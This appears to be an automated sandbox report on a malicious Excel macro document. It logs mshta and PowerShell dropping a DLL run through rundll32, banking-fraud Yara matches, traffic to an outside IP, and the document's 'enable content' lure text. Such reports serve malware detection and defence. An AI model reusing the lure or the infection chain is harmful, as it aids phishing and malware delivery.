                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: mshta.exe, 00000004.00000002.433404123.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427907544.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411714841.000000000024C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000002.433404123.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427907544.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411714841.000000000024C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            Source: Yara matchFile source: 12.2.rundll32.exe.3c0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c60000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e30000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.cc0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2490000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ea0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2380000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ea0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.29f0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2290000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3120000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.520000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e70000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27d0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c90000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22e0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ab0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2260000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2c40000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e20000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a20000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.30f0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2ee0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d20000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3130000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4b0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c90000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f30000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2270000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3100000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2380000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3100000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ae0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.920000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.608492557.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667504927.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667870525.0000000002DF1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565617411.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566094968.0000000002380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667560205.0000000002AB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568518476.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667419702.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608452137.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608835240.0000000000C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.531678798.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667165192.0000000002290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608404160.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529589229.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565770614.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.528939071.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608758914.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667142438.0000000002261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667531977.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565871959.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666923512.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568211571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.611962960.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667706749.0000000002C41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529026211.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529348749.0000000000960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667352422.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609013404.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609038210.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565688432.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666878998.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667611615.0000000002B11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.668008278.0000000002F91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529634937.0000000002F31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.611361259.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.530108491.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667590732.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.669688860.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667897137.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529436746.0000000002270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608896622.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529463306.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529946931.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568292263.0000000000251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666799791.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608866669.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666842278.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529386246.0000000000991000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566246263.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566399792.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566320781.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529511633.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565939675.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529254761.0000000000921000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609334950.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609062898.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529784917.0000000003100000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.611503359.00000000003A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529563571.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609120107.00000000030C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565832376.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566124768.00000000023B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609258728.0000000003121000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.491615915.0000000000240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566069057.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609178207.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666953938.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667829863.0000000002D20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565803219.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667636789.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565639567.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608543419.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565905688.0000000000521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            Source: 2022-28-01_1202.xls, Macro extractor: Sheet: REEEEEEEE contains: mshta
                            Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: 2022-28-01_1202.xls, Stream path: 'Workbook'
                            Source: 2022-28-01_1202.xls.0.dr, Stream path: 'Workbook'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\ProgramData\JooSee.dll
                            Source: 2022-28-01_1202.xls, Initial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003743469_2_00374346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003913AD9_2_003913AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038C3A09_2_0038C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038E3959_2_0038E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038D3899_2_0038D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038F4359_2_0038F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038044F9_2_0038044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003764E29_2_003764E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003885199_2_00388519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037A55F9_2_0037A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003825509_2_00382550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003755489_2_00375548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003895FA9_2_003895FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037E5CF9_2_0037E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038C6319_2_0038C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003886069_2_00388606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038A6669_2_0038A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037D6D89_2_0037D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003866CA9_2_003866CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003777359_2_00377735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038473C9_2_0038473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003797149_2_00379714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038176B9_2_0038176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037B74D9_2_0037B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003748169_2_00374816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003818899_2_00381889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003789699_2_00378969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038894B9_2_0038894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003909B59_2_003909B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003759F29_2_003759F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038AA309_2_0038AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00371A569_2_00371A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037EA999_2_0037EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00378B3D9_2_00378B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038BB239_2_0038BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00380B199_2_00380B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037BB7E9_2_0037BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038CB5B9_2_0038CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00387BA69_2_00387BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00379B839_2_00379B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00384B879_2_00384B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038DBEA9_2_0038DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00388BE39_2_00388BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00372BD99_2_00372BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00389BCF9_2_00389BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00377C379_2_00377C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038AC3A9_2_0038AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00373C3C9_2_00373C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00390C149_2_00390C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00374C5D9_2_00374C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00386C499_2_00386C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038DCF79_2_0038DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00385CC49_2_00385CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00376D249_2_00376D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00386DF89_2_00386DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00387DD59_2_00387DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00379DCF9_2_00379DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00390E3A9_2_00390E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00373E3F9_2_00373E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038BE279_2_0038BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038AE6D9_2_0038AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00375E609_2_00375E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00380E539_2_00380E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037EE819_2_0037EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037AEFB9_2_0037AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00389EEC9_2_00389EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00374EE39_2_00374EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038DEDC9_2_0038DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00390F339_2_00390F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037CF479_2_0037CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037DFF39_2_0037DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00377FF29_2_00377FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00373C3C10_2_00373C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037901110_2_00379011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038044F10_2_0038044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003820BA10_2_003820BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037F8FD10_2_0037F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037D6D810_2_0037D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038411610_2_00384116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003913AD10_2_003913AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037AB8710_2_0037AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003895FA10_2_003895FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003759F210_2_003759F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00377FF210_2_00377FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00377C3710_2_00377C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038AC3A10_2_0038AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00390E3A10_2_00390E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038AA3010_2_0038AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00373E3F10_2_00373E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038C63110_2_0038C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038F43510_2_0038F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038BE2710_2_0038BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037481610_2_00374816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00390C1410_2_00390C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038000110_2_00380001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038860610_2_00388606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038907F10_2_0038907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038AE6D10_2_0038AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00375E6010_2_00375E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038A66610_2_0038A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00371A5610_2_00371A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037205110_2_00372051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037225110_2_00372251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00374C5D10_2_00374C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00380E5310_2_00380E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0039005610_2_00390056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00386C4910_2_00386C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003770B310_2_003770B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037F09B10_2_0037F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037EA9910_2_0037EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038188910_2_00381889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037EE8110_2_0037EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037AEFB10_2_0037AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DCF710_2_0038DCF7
